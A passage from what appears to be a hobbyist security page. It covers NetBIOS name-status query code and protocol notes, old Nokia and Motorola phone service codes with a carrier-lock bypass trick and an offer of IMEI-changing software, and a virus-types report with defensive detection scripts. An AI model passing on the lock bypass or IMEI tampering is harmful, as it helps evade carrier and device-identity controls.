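    raw = name.upper().encode("ascii")[:15].ljust(15, pad) + bytes([suffix])
    label = b"".join(bytes([0x41 + (b >> 4), 0x41 + (b & 0x0F)]) for b in raw)
    return bytes([len(label)]) + label + b"\x00"     # length, label, root label


def build_node_status_query(txid: int = 0x1337) -> bytes:
    """12-byte header (one question, no flags) + question '*' / NBSTAT / IN."""
    header = struct.pack(">HHHHHH", txid, 0x0000, 1, 0, 0, 0)
    return header + encode_name("*") + struct.pack(">HH", NBSTAT, IN_CLASS)


def _skip_name(data: bytes, off: int) -> int:
    while data[off]:
        off += data[off] + 1
    return off + 1


def parse_node_status_response(data: bytes) -> Tuple[List[dict], bytes]:
    """Return (name table, unit id / MAC) from an NBSTAT response."""
    _txid, flags, qdcount, ancount, _, _ = struct.unpack_from(">HHHHHH", data, 0)
    if not flags & 0x8000:
        raise ValueError("not a response")
    if flags & 0x000F:
        raise ValueError(f"NBNS error, rcode={flags & 0xF}")
    if ancount < 1:
        raise ValueError("no answer record")
    off = 12
    for _ in range(qdcount):                  # echoed question, if present
        off = _skip_name(data, off) + 4
    off = _skip_name(data, off)               # answer RR name
    rtype = struct.unpack_from(">HHIH", data, off)[0]
    off += 10                                 # type, class, ttl, rdlength
    if rtype != NBSTAT:
        raise ValueError(f"unexpected record type 0x{rtype:04x}")
    num_names, off = data[off], off + 1
    table = []
    for _ in range(num_names):
        raw, suffix = data[off:off + 15], data[off + 15]
        nflags = struct.unpack_from(">H", data, off + 16)[0]
        off += 18
        table.append({
            "name": raw.rstrip(b" \x00").decode("latin-1"),
            "suffix": suffix,
            "type": "G" if nflags & 0x8000 else "U",   # bit 15: group name
            "active": bool(nflags & 0x0400),           # bit 10: ACT
            "service": SUFFIX_SERVICE.get(suffix, "unknown"),
        })
    return table, data[off:off + 6]           # statistics begin with the MAC


# --- constructed sample response (names and MAC are invented) ---------------
def _entry(name: bytes, suffix: int, nflags: int) -> bytes:
    return name.ljust(15, b" ") + bytes([suffix]) + struct.pack(">H", nflags)

_TABLE = [
    _entry(b"WORKSTATION1", 0x00, 0x0400),              # unique, active
    _entry(b"WORKSTATION1", 0x20, 0x0400),              # file server service
    _entry(b"CORPDOMAIN", 0x00, 0x8400),                # group: domain name
    _entry(b"CORPDOMAIN", 0x1E, 0x8400),                # group: browser elections
    _entry(b"\x01\x02__MSBROWSE__\x02", 0x01, 0x8400),  # master browser
]
_RDATA = bytes([len(_TABLE)]) + b"".join(_TABLE) + bytes.fromhex("001122334455") + b"\x00" * 40
SAMPLE_RESPONSE = (
    struct.pack(">HHHHHH", 0x1337, 0x8400, 0, 1, 0, 0)  # response, authoritative
    + encode_name("*")
    + struct.pack(">HHIH", NBSTAT, IN_CLASS, 0, len(_RDATA))
    + _RDATA
)
```

The decoder deliberately refuses anything whose header does not have the response bit set or carries a non-zero RCODE, so a stray query or a name-service error is never mistaken for an empty name table.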


NetBIOS Sessions
The NetBIOS session service provides a connection-oriented, reliable, full-duplex message service to a user process. NetBIOS requires one process to be the client and the other to be the server. Session establishment requires prearranged cooperation between the two stations: one application must have issued a Listen command when another application issues a Call command. The Listen command references a name in its NetBIOS name table (or WINS server), and also the remote name an application must use to qualify as a session partner. If the receiver (listener) is not already listening, the Call will be unsuccessful. If the call succeeds, each application receives notification of session establishment together with the session ID. The Send and Receive commands then transfer data. At the end of a session, either application can issue a Hang-Up command. There is no real flow control for the session service because it is assumed that a LAN is fast enough to carry the required traffic.

NetBIOS Datagrams
Datagrams can be sent to a specific name, sent to all members of a group, or broadcast to the entire LAN. As with other datagram services, NetBIOS datagrams are connectionless and unreliable. The Send_Datagram command requires the caller to specify the name of the destination; if the destination is a group name, every member of the group receives the datagram. The caller of the Receive_Datagram command must specify the local name for which it wants to receive datagrams. The Receive_Datagram command also returns the name of the sender, in addition to the actual datagram data. If NetBIOS receives a datagram but there are no Receive_Datagram commands pending, the datagram is discarded. The Send_Broadcast_Datagram command sends the message to every NetBIOS system on the local network. When a broadcast datagram is received by a NetBIOS node, every process that has issued a Receive_Broadcast_Datagram command receives the datagram. If none of these commands are outstanding when the broadcast datagram is received, the datagram is discarded.

NetBIOS enables an application to establish a session with another device and lets the network redirector and transaction protocols pass a request to and from another machine. NetBIOS does not actually manipulate the data. The NetBIOS specification defines an interface to the network protocol used to reach those services, not the protocol itself. Historically, NetBIOS has been paired with a network protocol called NetBEUI (NetBIOS Extended User Interface). The association of the interface and the protocol has sometimes caused confusion, but the two are different. Network protocols always provide at least one method for locating and connecting to a particular service on a network. This is usually accomplished by converting a node or service name to a network address (name resolution). NetBIOS service names must be resolved to an IP address before connections can be established over TCP/IP. Most NetBIOS implementations for TCP/IP accomplish name-to-address resolution by using either broadcasts or LMHOSTS files. In a Microsoft environment, you would probably also use a NetBIOS Name Server, known as WINS.

NetBEUI Explained
NetBEUI (NetBIOS Extended User Interface) is an enhanced version of the NetBIOS protocol used by network operating systems. It formalizes the transport frame that was never standardized in NetBIOS and adds additional functions. It is the transport-layer driver frequently used by Microsoft's LAN Manager, and it implements the OSI LLC2 protocol. NetBEUI is the original PC networking protocol and interface designed by IBM for the LAN Manager server; it was later adopted by Microsoft for its networking products. It specifies the way that higher-level software sends and receives messages over the NetBIOS Frames protocol, and it runs over the standard 802.2 data-link layer.

NetBIOS Scopes
A NetBIOS scope ID provides an extended naming service for the NetBIOS over TCP/IP (NBT) module. Its primary purpose is to isolate NetBIOS traffic on a single network to only those nodes with the same scope ID. The scope ID is a character string that is appended to the NetBIOS name; the scope IDs of two hosts must match, or the two hosts will not be able to communicate. Scope IDs also allow computers to use the same computer name as long as they have different scope IDs, because the scope ID becomes part of the NetBIOS name and makes the whole name unique.


Mobile hacking
Nokia 2110 / 2110i: the following codes show the software version, software date and hardware model number of your phone. On the 2110, type *#9999#. On the 2110i, one of the following may work: *#170602112302# or *#682371158412125#.

Show IMEI code


If you need to know the IMEI code of your phone, simply press *#06# and it is shown on the display.

Change IMEI code


If you want to change the IMEI code of your phone (we don't want to know why), here is the software you'll need.

Show manufact. date


To get the manufacturing date of your phone, press *#3283# (= *#DATE#). On 1995 phones the date is in "mmyy" format; 1996 and later phones show the date in "wwyy" (week and year) format.

Unlock SP lock
Here is a way to unlock a phone that is Service Provider (SP) locked without knowing the SP lock code. Give it a try (and give us feedback, please): turn the phone on and, when it asks for the Security Code, press 112 <send>, then quickly press # send end send end. Each time you turn the phone off the lock resets, so this has to be repeated every time the phone is turned on. Still, it is better than nothing.

Pin-Out

Looking at the bottom of the phone:

  ANT            16 . . . . . . . 9
  (O)            I-I-I-I-I-I-I-I          (   )   ( o )
  CON             8 . . . . . . . 1                Charging connector

The left symbol (O) is the antenna connector for car kits. The row numbered 16-9 on the top and 8-1 on the bottom is the system connector. The ( ) is the open space next to the connector, and the ( o ) is the charging connector for your home charger.

PIN Description
1 - Digital ground
2 - External audio input from accessories or hands-free microphone; multiplexed with the junction box connection control signal
3 - Analogue ground for accessories
4 - Transmitted DBUS data to the accessories
5 - Serial bidirectional data between the phone and accessories
6 - Hook indication; HP has a 100 kΩ pull-up resistor
7 - Hands-free device power on/off; data to flash programming device
8 - Battery charging voltage
9 - Digital ground
10 - External audio output to accessories or hands-free speaker
11 - DBUS data bit sync clock
12 - DBUS received data from the accessories
13 - Power supply to headset adapter
14 - Programming voltage for FLASH
15 - DBUS data clock
16 - Battery charging voltage

Software Bug
Software versions prior to 5.48 may randomly reset and restart the phone; this seems to be fixed in later versions.

For: Motorola d460, 2500, 6200 (Flare), 7500, 8200, 8400 and 8700.

IMEI: *#06# displays the IMEI on the 8700, but NOT on the 6200, 7500 or 8200.

To activate RBS (pause means holding the * key until a box appears): [pause] [pause] [pause] 1 1 3 [pause] 1 [pause] [ok]. Now press [MENU], scroll to the 'Eng Field Options' function with the arrow keys, and enable it.

To de-activate RBS: [pause] [pause] [pause] 1 1 3 [pause] 0 [pause] [ok]. This only works with some software versions; please report what works and what doesn't for you. Reported working, by country: d460: IT; 6200 Flare: UK (Orange), AU; 7500: IT (model F16, HW 5.2, SW 2.1); 8200: ES, AU, NL, BE; 8400: IT, NL; 8700: AU, IT, SG, DE, ES, ZA.

Uses of RBS:
Distance from base station: place a call and, when it is answered, press [MENU] until 'Eng Field Option' is displayed, press [OK], select 'Active Cell', press [OK], then press [MENU] until 'Time Adv xxx' appears, where xxx is a number. Multiply this number by 550; the result is the distance from the RBS (Radio Base Station) in metres. Signal quality: press [MENU] until 'Eng Field Option' is displayed, press [OK], select 'Active Cell', press [OK], then press [MENU] until 'C1' appears. This is the signal quality; if it stays negative for longer than 5 seconds, a new cell is selected.


Viruses

Index

Introduction to Computer Viruses
History
Why Do People Write Viruses
Virus Code


Introduction to Computer Viruses


A person might suspect a computer virus infection when the computer starts acting differently: for instance it gets slow, or when it is turned on it reports that all the data has been erased, or a document being written looks different, with chapters missing or something else abnormal. The next thing that usually happens is that the owner of the possibly infected computer panics, thinking that all their work is gone. That could be true, but in most cases the virus has not done any harm yet; the harm comes when someone starts doing something without being sure what they are doing. Some people, trying to get rid of a virus, delete files or even format the whole hard disk, as my cousin did. That is not the best way to act on a suspected infection. What do people do when they get sick? If they do not know what is wrong with them, they see a doctor. It is the same with viruses: if you do not know what to do, call someone who knows more about viruses and get professional help.

If a person reads e-mail on their PC, uses diskettes to transfer files between the computer at work and the computer at home, or just transfers files between two computers, they have a good chance of getting a virus. They might also get viruses when downloading files from any Internet site. There was a time when people could be sure that some sites were secure and had no virus problems, but nowadays nobody can be sure of anything: there have been viruses even on Microsoft's download sites.

In this report I am going to introduce the different malware types, how they spread and how to deal with them. The most common viruses nowadays are macro viruses, and I am going to spend a little more time on them. I am also going to give an example of Trojan horses stealing passwords.

Comparison with biological viruses

How viruses work


A computer virus passes from one computer to another much as a biological virus passes from person to person. For example, experts estimate that the Mydoom worm infected a quarter of a million computers in a single day in January 2004. Another example is the ILOVEYOU virus of 2000, which had a similar effect and borrowed most of its operating style from Melissa. There are tens of thousands of viruses out there, and new ones are discovered every day. It is difficult to come up with a generic explanation of how viruses work, since they all vary in the way they infect and the way they spread. Instead, the following are some broad categories commonly used to describe the various types of virus.

Basic types of viruses


File viruses (parasitic viruses)
File viruses are pieces of code that attach themselves to executable files, driver files or compressed files, and are activated when the host program is run. After activation, the virus may spread by attaching itself to other programs in the system, and also carry out the malicious activity it was programmed for. Most file viruses spread by loading themselves into system memory and looking for other programs located on the drive. If one is found, the virus modifies the program's code so that it contains and activates the virus the next time it is run. It keeps doing this until it has spread across the system, and possibly to other systems that the infected program is shared with. Besides spreading themselves, these viruses also carry some type of destructive payload that can be activated immediately or by a particular trigger. The trigger could be a specific date, the number of times the virus has replicated, or anything equally trivial. Some examples of file viruses are Randex, Meve and MrKlunky.

Boot sector viruses


A boot sector virus affects the boot sector of a hard disk, which is a very crucial part. The boot sector is where the information about the drive's layout is stored, along with a small program that makes it possible for the operating system to boot. By inserting its code into the boot sector, a virus guarantees that it is loaded into memory during every boot sequence. A boot virus does not infect files; instead, it infects the disks that contain them, and perhaps this is the reason for their downfall. In the days when programs were carried around on floppies, boot sector viruses spread like wildfire. With the CD-ROM revolution it became impossible to infect pre-written data on a CD, which eventually stopped such viruses from spreading. Though boot viruses still exist, they are rare compared to new-age malicious software. Another reason they are not so prevalent is that operating systems today protect the boot sector, which makes it difficult for them to thrive. Examples of boot viruses are Polyboot.B and AntiEXE.
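As an added example (not code from the original report), the following parses a 512-byte MBR, validates the 0x55AA signature and the partition table described above, and compares a hash of the boot-code region with a known-good baseline: the partition table is what a boot-sector virus leaves alone so the disk still boots, and the code bytes are what it overwrites. Both sectors are constructed in memory; the NTFS partition at LBA 2048, the disk signature and the "infected" code bytes are invented for illustration. read_mbr reads the first sector of a real device such as /dev/sda (or \\.\PhysicalDrive0 on Windows) when run with sufficient privileges.

```python
"""Boot-sector integrity check for a 512-byte MBR.

Added example, not from the original page.  Layout: bytes 0..439 boot code,
440..443 Windows disk signature, 446..509 four 16-byte partition entries,
510..511 the 0x55AA signature.  Only the boot code is hashed, because the
disk signature may legitimately be rewritten by the OS.
"""
import hashlib
import struct

SECTOR = 512
BOOTCODE_END = 440          # bytes 0..439 are executable boot code
PART_TABLE = 446            # four 16-byte partition entries follow
SIGNATURE = b"\x55\xAA"


def parse_partition(entry: bytes) -> dict:
    status, _chs_first, ptype, _chs_last, lba_first, sectors = struct.unpack("<B3sB3sII", entry)
    return {"bootable": status == 0x80, "type": ptype, "lba_first": lba_first, "sectors": sectors}


def parse_mbr(sector: bytes) -> dict:
    """Validate the sector and return its boot-code hash and used partitions."""
    if len(sector) != SECTOR:
        raise ValueError(f"expected {SECTOR} bytes, got {len(sector)}")
    if sector[510:512] != SIGNATURE:
        raise ValueError("missing 0x55AA boot signature")
    entries = [parse_partition(sector[PART_TABLE + 16 * i:PART_TABLE + 16 * (i + 1)]) for i in range(4)]
    return {
        "bootcode_sha256": hashlib.sha256(sector[:BOOTCODE_END]).hexdigest(),
        "disk_signature": sector[440:444].hex(),
        "partitions": [e for e in entries if e["type"] != 0x00],
    }


def bootcode_matches(sector: bytes, baseline_sha256: str) -> bool:
    """True when the boot code is byte-identical to the recorded baseline."""
    return parse_mbr(sector)["bootcode_sha256"] == baseline_sha256


def first_difference(a: bytes, b: bytes) -> int:
    """Offset of the first differing byte in the boot-code region, or -1."""
    for i in range(BOOTCODE_END):
        if a[i] != b[i]:
            return i
    return -1


def read_mbr(device: str) -> bytes:
    """Read the first sector of a block device (needs privileges)."""
    with open(device, "rb") as f:
        return f.read(SECTOR)


# --- constructed sectors ---------------------------------------------------
def _mbr(bootcode: bytes) -> bytes:
    """Sector with the given boot code, a fixed disk signature and one
    bootable NTFS (type 0x07) partition starting at LBA 2048."""
    part1 = struct.pack("<B3sB3sII", 0x80, b"\x20\x21\x00", 0x07, b"\xFE\xFF\xFF", 2048, 204800)
    table = part1 + b"\x00" * 48
    return bootcode.ljust(BOOTCODE_END, b"\x00") + b"\xA1\xB2\xC3\xD4" + b"\x00\x00" + table + SIGNATURE

CLEAN_MBR = _mbr(b"\xFA\x33\xC0\x8E\xD0\xBC\x00\x7C\xFB" + b"\x90" * 16)  # invented "clean" code
INFECTED_MBR = _mbr(b"\xEB\x3C\x90VIRUS" + b"\xCC" * 16)               # same table, new code
BASELINE = parse_mbr(CLEAN_MBR)["bootcode_sha256"]

if __name__ == "__main__":
    for label, sector in (("clean", CLEAN_MBR), ("infected", INFECTED_MBR)):
        info = parse_mbr(sector)
        print(label, "bootcode ok" if bootcode_matches(sector, BASELINE) else "BOOT CODE CHANGED",
              "partitions:", info["partitions"])
```

The baseline hash belongs off the machine (in the same place you keep file-integrity baselines); a check that reads its reference value from the disk it is checking can be defeated by whatever rewrote the boot sector.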


Multipartite viruses
Multipartite viruses are a combination of boot sector viruses and file viruses. They arrive through infected media and reside in memory, then move on to the boot sector of the hard drive. From there, the virus infects executable files on the hard drive and spreads across the system. There aren't many multipartite viruses in existence today, but in their heyday they accounted for some major problems because of their capacity to combine different infection techniques. A well-known multipartite virus is Ywinz.

Macro viruses
Macro viruses infect files that contain macros. These include Microsoft Office documents such as Word documents, Excel spreadsheets, PowerPoint presentations and Access databases, and other application files such as Corel Draw and AmiPro. Since macro viruses are written in the language of the application and not in that of the operating system, they are platform-independent: they can spread between Windows, Mac and any other system, so long as it runs the required application. With the ever-increasing capabilities of macro languages in applications, and the possibility of infections spreading over networks, these viruses are major threats. The first macro virus was written for Microsoft Word and was discovered in August 1995. Today there are thousands of macro viruses in existence; some examples are Relax, Melissa.A and Bablas.

Network viruses
This kind of virus is proficient at spreading quickly across a Local Area Network (LAN) or even over the Internet. Usually it propagates through shared resources, such as shared drives and folders. Once it infects a new system, it searches the network for other vulnerable systems; when it finds one, it infects it too, and so spreads over the network. Some of the most notorious network viruses are Nimda and SQL Slammer.

E-mail viruses
An e-mail virus may be a form of macro virus that sends itself to all the contacts in the host's e-mail address book. If any of the recipients opens the attachment of the infected mail, it spreads to that new host's address book contacts and proceeds to send itself to all of them as well. These days e-mail viruses can infect hosts even if the infected e-mail is only previewed in a mail client. There are many ways in which a virus can infect or lie dormant on your PC; whether active or dormant, it is dangerous to leave one on your system, and it should be dealt with immediately.
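An added example, not from the original report, of the check a mail gateway or endpoint agent can apply to an attachment before any application opens it: does this Office document carry a VBA project? It covers both container formats the macro and e-mail virus sections above depend on. OOXML files (.docm/.xlsm/.pptm, and .docx files that were really saved as macro documents) are ZIP archives with a vbaProject.bin part declared in [Content_Types].xml; legacy OLE2 .doc/.xls/.ppt files store macros in streams named Macros and _VBA_PROJECT, whose names appear as UTF-16LE in the file. The OLE check searches the raw bytes for those names instead of parsing the compound-file directory, so that part is a heuristic. All sample documents are constructed in memory and the filenames are invented.

```python
"""Flag Office attachments that carry VBA macros.

Added example, not part of the original text.  has_macros() returns a
(verdict, reason) pair for raw document bytes; scan_attachment() adds the
extension check, because a VBA project inside a .docx/.xlsx/.pptx is a
format mismatch Office itself would not produce.
"""
import io
import zipfile
from typing import Tuple

OLE_MAGIC = b"\xD0\xCF\x11\xE0\xA1\xB1\x1A\xE1"
ZIP_MAGIC = b"PK\x03\x04"
VBA_CONTENT_TYPE = b"application/vnd.ms-office.vbaProject"
OLE_MACRO_STREAMS = [name.encode("utf-16-le") for name in ("_VBA_PROJECT", "Macros")]
MACRO_FREE_OOXML = {".docx", ".xlsx", ".pptx", ".dotx", ".xltx", ".potx"}


def has_macros(data: bytes) -> Tuple[bool, str]:
    if data.startswith(ZIP_MAGIC):
        try:
            with zipfile.ZipFile(io.BytesIO(data)) as zf:
                names = zf.namelist()
                ctypes = zf.read("[Content_Types].xml") if "[Content_Types].xml" in names else b""
        except zipfile.BadZipFile:
            return False, "corrupt zip container"
        parts = [n for n in names if n.lower().endswith("vbaproject.bin")]
        if parts:
            return True, "OOXML macro part: " + ", ".join(parts)
        if VBA_CONTENT_TYPE in ctypes:
            return True, "OOXML content type declares a VBA project"
        return False, "OOXML without a VBA project"
    if data.startswith(OLE_MAGIC):
        hits = [s.decode("utf-16-le") for s in OLE_MACRO_STREAMS if s in data]
        if hits:
            return True, "OLE macro stream(s): " + ", ".join(hits)
        return False, "OLE document without macro streams"
    return False, "not an Office container"


def scan_attachment(filename: str, data: bytes) -> dict:
    macros, reason = has_macros(data)
    ext = ("." + filename.rsplit(".", 1)[-1].lower()) if "." in filename else ""
    return {
        "filename": filename,
        "macros": macros,
        "reason": reason,
        "extension_mismatch": macros and ext in MACRO_FREE_OOXML,
    }


# --- constructed sample documents -----------------------------------------
def _ooxml(parts: dict) -> bytes:
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, body in parts.items():
            zf.writestr(name, body)
    return buf.getvalue()

SAMPLE_DOCM = _ooxml({
    "[Content_Types].xml": b'<Types><Override PartName="/word/vbaProject.bin" '
                           b'ContentType="application/vnd.ms-office.vbaProject"/></Types>',
    "word/document.xml": b"<w:document/>",
    "word/vbaProject.bin": OLE_MAGIC + b"\x00" * 56,   # the project is itself an OLE file
})
SAMPLE_DOCX = _ooxml({"[Content_Types].xml": b"<Types/>", "word/document.xml": b"<w:document/>"})
SAMPLE_DOC = (OLE_MAGIC + b"\x00" * 504 + "Macros".encode("utf-16-le")
              + b"\x00" * 20 + "_VBA_PROJECT".encode("utf-16-le"))
SAMPLE_TXT = b"plain text attachment"

if __name__ == "__main__":
    for fname, blob in (("invoice.docx", SAMPLE_DOCM), ("notes.docx", SAMPLE_DOCX),
                        ("old.doc", SAMPLE_DOC), ("readme.txt", SAMPLE_TXT)):
        print(scan_attachment(fname, blob))
```

The verdict is deliberately about presence, not maliciousness: the policy decision (block, strip, sandbox, or allow for a whitelisted sender) belongs to the gateway, and a document that reaches the user with its VBA project intact is the case the e-mail virus section describes.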


Other malicious software


Earlier, the only way a computer was at risk was when you inserted an infected floppy. In the new age of technology, every computer is interconnected with the rest of the world at some point or other, so it is difficult to pinpoint the source and/or time of an infection. As if that weren't bad enough, new-age computing has also brought about a new breed of malicious software. Today the term virus has become a generic term for all the different ways a computer can be attacked by malicious software. Besides the types of virus mentioned above, here is a look at some of the newer problems we face today.

Trojan horses
The biggest difference between a Trojan horse (or Trojan) and a virus is that Trojans don't spread themselves. Trojan horses disguise themselves as useful software available for download on the Internet, and naive users download and run them only to realise their mistake later. A Trojan horse is usually divided into two parts, a server and a client. It is the server that is cunningly disguised as important software and placed on peer-to-peer file-sharing networks or unofficial download sites; once it runs on your system, the attacker, who runs the client, has a high level of control over your machine, which can have devastating effects depending on the attacker's intentions. Trojan horses have evolved to a tremendous level of sophistication, which makes each one significantly different from the others. We have categorised them roughly as follows:

Remote access Trojans


These are the most commonly available Trojans. They give an attacker complete control over the victim's computer. The attacker can go through the files and read any personal information the user may have stored, such as credit card numbers, passwords and important financial documents.

Password-Sending Trojans
The purpose of such Trojans is to copy all cached passwords, watch for other passwords as you type them in, and send them to a specific e-mail address without the user's knowledge. Passwords for restricted Web sites, messaging services, FTP services and e-mail accounts come under direct threat from this kind of Trojan.

Keyloggers
These log the victim's keystrokes and send the logs to the attacker, who then searches them for passwords or other sensitive data. Most offer two modes, online and offline recording, and can be configured to send the log file to a specific e-mail address on a daily basis.

Destructive Trojans
The only function of these Trojans is to destroy and delete files. They can automatically delete all the core system files on your machine. The Trojan may be controlled by the attacker or programmed to strike like a logic bomb, starting on a specific day or at a specific hour.

Denial of Service (DoS) Trojans
The main idea behind DoS Trojans is to generate so much Internet traffic on the victim's machine that the connection is too overloaded to let the user visit a Web site or download anything. A variation is the mail-bomb Trojan, whose aim is to infect as many machines as possible and have them simultaneously flood specific e-mail addresses with messages whose random subjects and contents cannot be filtered.

Proxy/Wingate Trojans
These turn the victim's computer into a proxy (Wingate) server, making the infected machine available to the whole world for anonymous access to risky Internet services. The attacker can register domains or visit pornographic Web sites with stolen credit cards, or carry out similar illegal activities, without being traced.

FTP Trojans
These are probably the simplest, and the most dated. All they do is open port 21, the port for FTP transfers, and let everyone connect to your machine. Newer versions are password-protected, so only the attacker can connect.

Software Detection Killers
These Trojans kill the popular antivirus and firewall programs that protect your machine, so that the attacker can get in. A Trojan may have any one, or a combination, of the functions listed above.

Worms
Computer worms are programs that reproduce and run independently and travel across network connections. The main difference between viruses and worms is the way they reproduce and spread. A virus depends on a host file or boot sector, and on the transfer of files between machines, in order to spread, while a worm runs completely independently and spreads of its own accord through network connections. The security threat of a worm is equivalent to that of a virus: worms can do a whole range of damage, such as destroying essential files on your system, slowing it down severely, or causing essential programs to crash. Two famous examples of worms are Blaster (also known as MSBlast) and Sasser.

Spyware
Spyware is the new-age term for advertising-supported software (adware). Advertising in shareware is a way for shareware authors to make money other than by selling the product to the user. Several large media companies offer to place banner ads in such products in exchange for a share of the revenue from banner sales; if the user finds the banners annoying, there is usually an option to remove them by paying the licensing fee. Unfortunately, the advertising companies often also install additional tracking software on your system, which continuously uses your Internet connection to send statistical data back to the advertisers. While the companies' privacy policies claim that no sensitive or identifying data is collected and that you remain anonymous, the fact remains that you have a server sitting on your PC sending information about you and your surfing habits to a remote location, using your bandwidth. Spyware has been known to slow computers down with its fairly intensive use of processing power, to bring up pop-up windows at the most inappropriate times, and to change Internet browsing settings such as the home page or default search engine to its own services. Even if many do not consider this illegal, it is still a major security threat, and the fact that it is so hard to get rid of makes it as much of a nuisance as a virus.

Logic Bombs
A logic bomb is a program that has deliberately been written or modified to produce results, when certain conditions are met, that are unexpected and unauthorised by the legitimate users or owners of the software. Logic bombs may reside within standalone programs, or they may be part of worms or viruses. A variation of the logic bomb is the time bomb, which goes off at a certain time. An example of a time bomb is the infamous Friday the 13th (Jerusalem) virus.

Classification
Viruses can be subdivided into a number of types, the main ones being:

Boot sector viruses
Companion viruses
E-mail viruses
Logic bombs and time bombs
Macro viruses
Cross-site scripting viruses

Two other types of malware are often classified as viruses, but are actually forms of distributing malware:

Trojan horses
Worms

Boot sector virus
A boot sector virus alters, or hides in, the boot sector (usually the first sector) of a bootable floppy disk or hard drive. Boot sector viruses were prevalent in the 1980s.

Companion virus
A companion virus has no host file as such, but exploits the way MS-DOS resolves commands. It creates new files (typically .COM, though other extensions such as .EXD have been used) with the same base name as legitimate .EXE files. When a user types the name of a program without an extension, COMMAND.COM looks for a .COM file before an .EXE file (its fixed search order is .COM, .EXE, .BAT), so the virus runs first. For instance, if "filename.COM" (the virus) sits beside "filename.EXE" and the user types "filename", "filename.COM" runs, spreads the virus and performs its other tasks, and then passes control to the legitimate file, which behaves normally. Some companion viruses are known to run under Windows 95 and in DOS emulators on Windows NT systems. Path companion viruses create files with the same name as the legitimate program in a directory that comes earlier in the PATH. Such viruses have become increasingly rare since Windows XP, which no longer runs on top of MS-DOS (though the Windows command shell still resolves unqualified names by trying the extensions listed in PATHEXT in order, .COM before .EXE).
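As an added example (not part of the original page), here is a check a practitioner can run against the mechanism just described: a Python script that resolves command names the way COMMAND.COM does (.COM before .EXE before .BAT, walking PATH in order) and reports every .EXE that would be shadowed by a companion, whether the companion sits in the same directory or in an earlier PATH directory. The directory layout it builds is constructed test data and the file names are hypothetical; point `shadowed_executables` at a real PATH list to use it for real.

```python
import os
import tempfile

# COMMAND.COM tries these extensions, in this fixed order, when a command is
# typed without one. cmd.exe behaves the same way through its default PATHEXT.
DOS_SEARCH_ORDER = (".com", ".exe", ".bat")


def resolve_like_dos(command, path_dirs):
    """Return the file COMMAND.COM would run for `command`: walk PATH in order
    and, inside each directory, try .COM before .EXE before .BAT."""
    for d in path_dirs:
        for ext in DOS_SEARCH_ORDER:
            candidate = os.path.join(d, command + ext)
            if os.path.isfile(candidate):
                return candidate
    return None


def shadowed_executables(path_dirs):
    """Find every .EXE on the path that would NOT be the file actually run when
    its base name is typed. Each hit is (exe_path, file_that_runs_instead).
    Catches both same-directory companions (NAME.COM beside NAME.EXE) and
    path companions (NAME.COM in an earlier PATH directory)."""
    hits = []
    for d in path_dirs:
        try:
            entries = sorted(os.listdir(d))
        except OSError:
            continue
        for entry in entries:
            base, ext = os.path.splitext(entry)
            if ext.lower() != ".exe":
                continue
            legit = os.path.join(d, entry)
            winner = resolve_like_dos(base.lower(), path_dirs)
            if winner is not None and os.path.normcase(winner) != os.path.normcase(legit):
                hits.append((legit, winner))
    return hits


def build_demo_tree():
    """Constructed layout (hypothetical names, not real system files) showing
    both companion styles:
      dir0/edit.com                      path companion for dir1/edit.exe
      dir1/format.com beside format.exe  same-directory companion
      dir1/clean.exe                     no companion
    Returns the PATH-ordered list of directories."""
    root = tempfile.mkdtemp(prefix="companion_demo_")
    dir0 = os.path.join(root, "dir0")
    dir1 = os.path.join(root, "dir1")
    os.mkdir(dir0)
    os.mkdir(dir1)
    for name in ("dir0/edit.com", "dir1/edit.exe", "dir1/format.com",
                 "dir1/format.exe", "dir1/clean.exe"):
        with open(os.path.join(root, *name.split("/")), "wb") as f:
            f.write(b"MZ-stub")          # placeholder content, constructed
    return [dir0, dir1]


def demo():
    """Run the check on the constructed tree. Returns the shadowed base names,
    sorted, each with the extension of the file that would actually run."""
    path_dirs = build_demo_tree()
    out = []
    for legit, winner in shadowed_executables(path_dirs):
        base = os.path.splitext(os.path.basename(legit))[0]
        out.append((base, os.path.splitext(winner)[1]))
    return sorted(out)


if __name__ == "__main__":
    for base, ext in demo():
        print("%s.exe is shadowed by %s%s" % (base, base, ext))
```

The check deliberately reports the file that wins the lookup rather than just "a .COM exists", because on a real system the winner may be a legitimate .COM (many DOS utilities shipped as .COM); the analyst then compares the two files by hand.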

E-mail virus
An e-mail virus is a virus that uses e-mail messages as its means of transport. Such viruses often copy themselves by automatically mailing copies to hundreds of people in the victim's address book.

Logic bomb
A logic bomb contains code that lies inert until specific conditions are met; satisfying the conditions triggers a certain function (such as printing a message to the user or deleting files). An example of a logic bomb would be a virus that waits to execute its payload until it has infected a certain number of hosts. A time bomb is a subset of logic bomb that is set to trigger on a particular date and/or time.

Macro virus
A macro virus, often written in the scripting languages of Microsoft programs such as Word and Excel, spreads within Microsoft Office by infecting documents and spreadsheets.

Cross-site scripting virus
A cross-site scripting virus (XSSV) is a virus that uses cross-site scripting vulnerabilities to replicate. An XSSV spreads between vulnerable web applications and web browsers, each passing it on to the other.

Trojan horse
Trojan Horses are impostor files that claim to be something desirable but, in fact, are malicious. Rather than insert code into existing files, a Trojan horse appears to do one thing (install a screen saver, or show a picture inside an e-mail for example) when in fact it does something entirely different, and potentially malicious, such as erase files. Trojans can also open back doors so that computer hackers can gain access to passwords, and other personal information stored on a computer. Although often referred to as such, Trojan horses are not viruses in the strict sense because they cannot replicate automatically. For a Trojan horse to spread, it must be invited onto a computer by the user opening an email attachment or downloading and running a file from the Internet, for example.

Worm
A worm is a piece of software that uses computer networks and security flaws to create copies of itself. A copy of the worm scans the network for any other machine that has a specific security flaw, replicates itself to that machine through the flaw, and then begins scanning and replicating anew.

Worms are programs that replicate from system to system without using a host file, in contrast to viruses, which spread through an infected host file. Although worms often travel inside other files, typically Word or Excel documents, there is a difference in how worms and viruses use the host file: a worm usually releases a document that already has the "worm" macro inside it, and the entire document travels from computer to computer, so the document as a whole should be considered the worm. Mydoom and ILOVEYOU are two examples of worms.

Effects of computer viruses


Some viruses are programmed to damage the computer by damaging programs, deleting files, or reformatting the hard disk. Others are not designed to do any damage, but simply replicate themselves and make their presence known by presenting text, video, or audio messages. Even these benign viruses can create problems for the computer user. They typically take up computer memory used by legitimate programs. As a result, they often cause erratic behavior and can result in system crashes. In addition, many viruses are bug-ridden, and these bugs may lead to system crashes and data loss.

Use of the word "virus"


